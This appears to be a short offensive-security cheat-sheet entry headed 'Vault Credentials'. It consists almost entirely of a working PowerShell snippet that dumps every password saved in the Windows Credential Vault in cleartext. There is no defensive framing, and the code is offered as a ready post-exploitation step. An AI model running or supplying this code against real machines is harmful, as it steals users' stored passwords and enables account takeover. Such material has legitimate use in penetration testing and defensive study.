VAULT CREDENTIALS

Dump vault credentials using PowerShell

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault 
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Last updated